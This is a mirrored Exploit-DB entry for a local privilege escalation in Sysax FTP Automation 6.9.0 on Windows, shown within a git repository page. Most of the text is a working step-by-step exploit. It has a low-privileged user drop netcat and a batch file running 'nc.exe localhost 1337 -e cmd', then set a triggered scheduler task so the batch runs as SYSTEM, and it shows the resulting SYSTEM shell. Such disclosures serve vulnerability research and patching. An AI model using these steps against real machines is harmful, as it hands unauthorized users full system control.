bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/50834.txt
Offensive Security e55394b7d4 DB: 2022-03-23 
6 changes to exploits/shellcodes

Sysax FTP Automation 6.9.0 - Privilege Escalation
iRZ Mobile Router - CSRF to RCE
Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure

ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
2022-03-23 05:01:38 +00:00

37 lines
No EOL
1.6 KiB
Text
Raw Permalink Blame History

# Exploit Author: bzyo (@bzyo_)
# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation
# Date: 03-20-2022
# Vulnerable Software: Sysax FTP Automation 6.9.0
# Vendor Homepage: https://www.sysax.com/
# Version: 6.9.0
# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi
# Tested on: Windows 10 x64
# Details:
Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system.
# Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account
# Exploit:
Logged in as low privileged account
1. Create folder c:\temp
2. Download netcat (nc.exe) to c:\temp
3. Create file 'pwn.bat' in c:\temp with contents
c:\temp\nc.exe localhost 1337 -e cmd
4. Open command prompt and netcat listener
nc -nlvvp 1337
5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation
6. Select Setup Scheduled/Triggered Tasks
- Add task (Triggered)
- Update folder to monitor to be c:\temp
- Check 'Run task if a file is added to the monitor folder or subfolder(s)'
- Choose 'Run any other Program' and choose c:\temp\pwn.bat
- Uncheck 'Login as the following user to run task'
- Finish and Save
7. Create new text file in c:\temp
8. Check netcat listener
C:\WINDOWS\system32>whoami
whoami
nt authority\system
Reference in a new issue View git blame Copy permalink